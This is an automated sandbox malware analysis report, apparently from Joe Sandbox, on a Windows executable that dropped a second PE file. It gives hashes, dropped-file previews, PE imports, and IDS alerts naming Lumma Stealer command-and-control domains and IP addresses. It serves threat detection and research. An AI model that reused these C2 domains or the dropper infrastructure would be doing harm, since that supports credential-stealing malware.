Preview:	MDMP..a..... ......._.]g............4...............H.......<...<.......t....+..........`.......8...........T............?..Np..........x...........d...............................................................................eJ..............GenuineIntel............T...........P.]g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2DD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8286
Entropy (8bit):	3.7008468814449897
Encrypted:	false
SSDEEP:	192:R6l7wVeJSJ676YJU6JYHgmf3CslU2pDT89bT8sfBRm:R6lXJE676Y66mgmfjO/TPfG
MD5:	4B8F80AB411E997C46587F5F9020C2E3
SHA1:	EEF103FD935FA3C7EC643DF849A1D80F58D8268A
SHA-256:	2AE97923F0E7192150234BD7B8FEF9EE5BE30AD6876A517EFC3666CE181C3FA8
SHA-512:	8A7BA5BDBEEBBFDF025DC217416A0BBE88D4B9E25A927C15EA33E4F13D12CB82A16980C71968EEC7C8D580E68616E26D7AF0F0B6DA65FF5499C28933BC6DA41C
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD30C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.4461477192113845
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9+xWpW8VYrYm8M4JcW9pGeFK+q81IxaCdyFzFDwMdd:uIjfEI74g7VrJc+oy8lyFzFLdd
MD5:	B6F2FF89FEC8BB6C81C10EC1BFD768DE
SHA1:	7380F87DF26F3CF0190D29708AF0281248D9052F
SHA-256:	A1792DB69D1D27FE84900EB8BF2AA05449D650F2298C0E4D2B7F58E911C339F1
SHA-512:	F9D1C1BCE36E445597BCA0E758CAEBA26867BDDD9C5555A5A2CF8A2CD8FBB4F792525109277E23BAA35678DDD9696A2E4963E09361EAC4133F0DA211DF709EDE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="630975" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\TN78WX7nJU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	6.633746849794654
Encrypted:	false
SSDEEP:	6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:	D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:	4A2095690BA8F1325DD10167318728447D12058A
SHA-256:	4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:	7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: XIaCqh1vRm.exe, Detection: malicious, Browse Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C455.tmp.exe

Download File

Process:	C:\Users\user\Desktop\TN78WX7nJU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	6.633746849794654
Encrypted:	false
SSDEEP:	6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:	D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:	4A2095690BA8F1325DD10167318728447D12058A
SHA-256:	4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:	7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: XIaCqh1vRm.exe, Detection: malicious, Browse Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465432428035737
Encrypted:	false
SSDEEP:	6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbi:MXD94+WlLZMM6YFH5+i
MD5:	F52525DA488CB492DD3BEC87C468132A
SHA1:	F070C0806B6C0471F8FD96731877676688AB2360
SHA-256:	BCC53A89D75CD6B97D4395235876CCDCC1D1C0C0B417A7F5EBC68F84E5C9385B
SHA-512:	C06E743BBD864D6935CA474A2EF5DEFA5C0E10F308F9259BF5831E27856D7D729012C1B5F95321905B3C94641D2E471C14E833D61C7299DB37364D644FCAC0D0
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR...)N...............................................................................................................................................................................................................................................................................................................................................]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.956894638274951
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TN78WX7nJU.exe
File size:	457'216 bytes
MD5:	e1c246e51c4460e34a3429a6fc397942
SHA1:	48ee7173d3a33be1b81ce82c351b1b35bfcd4aac
SHA256:	5b6c7709634f9b0f38fcac6fb91bf82eefda4096935f0a539623df2ec981f5b5
SHA512:	094e4e72bbdc3e5c3df0a770b4908bced529efb175ca35adc11cfa72123411ebfa7632cdff3b3aff692f3b163f9327de531c0f22fd22f397a4d5935618c77f4c
SSDEEP:	6144:/g/RikrH9UMQivQq298+yut1M/xYvTFN8guPVmXLxreU:/g/0knOqI8+yOsEYSeU
TLSH:	19A4E02036ED9426E3FB89357D7E82A42A7BF863AB35610F1775271F0E702D48522367
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0M..t,x.t,x.t,x..c..u,x.j~..j,x.j~..`,x.j~...,x.S...},x.t,y..,x.j~..u,x.j~..u,x.j~..u,x.Richt,x.................PE..L...p.3e...

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x4017d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65339470 [Sat Oct 21 09:05:52 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	8ca6f10ad43ce90425a500a902abdeba

Entrypoint Preview

Instruction
call 00007F1BC48D2012h
jmp 00007F1BC48CF45Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000B4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x529ec	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42f000	0x16020	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52528	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4fefc	0x50000	c980f14521144584317247d742d49e29	False	0.8434814453125	data	7.543798990454789	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x22cc	0x2400	dd2e9e430f55ce1f7aff50cae510552f	False	0.3570963541666667	data	5.4047175303331665	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x54000	0x3da548	0x7000	0e78f5652cbd258ad8f8231a17afddf9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42f000	0x16020	0x16200	5218286c30f17cb19b4f3dbef925edc3	False	0.5519840218926554	data	5.625752720194425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x440b20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x42f810	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.5189232409381663
RT_ICON	0x4306b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.5717509025270758
RT_ICON	0x430f60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.6105990783410138
RT_ICON	0x431628	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.6502890173410405
RT_ICON	0x431b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.42147302904564315
RT_ICON	0x434138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.4910881801125704
RT_ICON	0x4351e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.48565573770491804
RT_ICON	0x435b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.5957446808510638
RT_ICON	0x436048	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkmen	Turkmenistan	0.35287846481876334
RT_ICON	0x436ef0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkmen	Turkmenistan	0.5040613718411552
RT_ICON	0x437798	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkmen	Turkmenistan	0.5737327188940092
RT_ICON	0x437e60	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkmen	Turkmenistan	0.6098265895953757
RT_ICON	0x4383c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkmen	Turkmenistan	0.34380863039399623
RT_ICON	0x439470	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkmen	Turkmenistan	0.33811475409836067
RT_ICON	0x439df8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkmen	Turkmenistan	0.39361702127659576
RT_ICON	0x43a2c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8121002132196162
RT_ICON	0x43b170	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8465703971119134
RT_ICON	0x43ba18	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.8271889400921659
RT_ICON	0x43c0e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.8395953757225434
RT_ICON	0x43c648	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.8026970954356847
RT_ICON	0x43ebf0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8332551594746717
RT_ICON	0x43fc98	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.844672131147541
RT_ICON	0x440620	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8625886524822695
RT_STRING	0x441b98	0x4fe	data			0.43661971830985913
RT_STRING	0x442098	0x66	data			0.6862745098039216
RT_STRING	0x442100	0x776	data			0.42670157068062825
RT_STRING	0x442878	0x54c	data			0.4476401179941003
RT_STRING	0x442dc8	0x7e0	data			0.42162698412698413
RT_STRING	0x4435a8	0x6da	data			0.4298745724059293
RT_STRING	0x443c88	0x756	data			0.422790202342918
RT_STRING	0x4443e0	0x63c	data			0.43796992481203006
RT_STRING	0x444a20	0x5fa	data			0.43790849673202614
RT_ACCELERATOR	0x440b00	0x20	data			1.15625
RT_GROUP_CURSOR	0x4419c8	0x14	data			1.25
RT_GROUP_ICON	0x440a88	0x76	data	Turkmen	Turkmenistan	0.6694915254237288
RT_GROUP_ICON	0x43a260	0x68	data	Turkmen	Turkmenistan	0.7115384615384616
RT_GROUP_ICON	0x435fd0	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x4419e0	0x1b4	data			0.5665137614678899

Imports

DLL	Import
KERNEL32.dll	SetDefaultCommConfigA, SetLocaleInfoA, GetNumaProcessorNode, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, UnregisterWait, BuildCommDCBW, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, OpenFileMappingW, WriteConsoleOutputAttribute, WriteProcessMemory, SetFileAttributesA, GetCommandLineW, CreateFileA, WriteConsoleW, MultiByteToWideChar, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, HeapSize, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, ReadFile, InitializeCriticalSectionAndSpinCount, RtlUnwind, HeapAlloc, HeapReAlloc, VirtualAlloc, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll	GetProcessDefaultLayout
GDI32.dll	GetBitmapBits

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-14T14:12:46.131119+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-14T14:12:47.868178+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	176.113.115.19	80	TCP
2024-12-14T14:12:52.521399+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	52644	1.1.1.1	53	UDP
2024-12-14T14:12:52.661007+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	52948	1.1.1.1	53	UDP
2024-12-14T14:12:54.029381+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:54.029381+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:56.157822+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:56.157822+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-14T14:12:56.173425+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	60088	1.1.1.1	53	UDP
2024-12-14T14:12:57.535218+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-14T14:12:57.535218+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-14T14:12:59.016757+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-14T14:12:59.016757+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.96.1	443	TCP
2024-12-14T14:12:59.018983+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	63184	1.1.1.1	53	UDP
2024-12-14T14:12:59.179780+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	64277	1.1.1.1	53	UDP
2024-12-14T14:12:59.324973+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	51481	1.1.1.1	53	UDP
2024-12-14T14:12:59.503865+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	63953	1.1.1.1	53	UDP
2024-12-14T14:12:59.656713+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	56148	1.1.1.1	53	UDP
2024-12-14T14:12:59.797862+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	65393	1.1.1.1	53	UDP
2024-12-14T14:13:01.486388+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	23.55.153.106	443	TCP
2024-12-14T14:13:02.327356+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49735	23.55.153.106	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 14, 2024 14:12:44.237211943 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:44.237261057 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:44.237356901 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:44.248621941 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:44.248660088 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:45.466943979 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:45.467015028 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:45.548891068 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:45.548909903 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:45.549216986 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:45.549261093 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:45.552670002 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:45.595324039 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:46.131145954 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:46.131218910 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:46.131241083 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:46.131284952 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:46.137761116 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:46.137788057 CET	443	49730	172.67.179.207	192.168.2.4
Dec 14, 2024 14:12:46.137801886 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:46.137834072 CET	49730	443	192.168.2.4	172.67.179.207
Dec 14, 2024 14:12:46.396420002 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:46.516578913 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:46.516732931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:46.516954899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:46.640424967 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.867899895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.867947102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.867964029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.868177891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.868179083 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.873892069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.875283957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987637997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987704992 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987741947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987749100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987749100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987776041 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987808943 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987814903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987814903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987845898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.987883091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.987883091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.988058090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.988102913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.988176107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.988224983 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.992392063 CET	80	49731	176.113.115.19	192.168.2.4
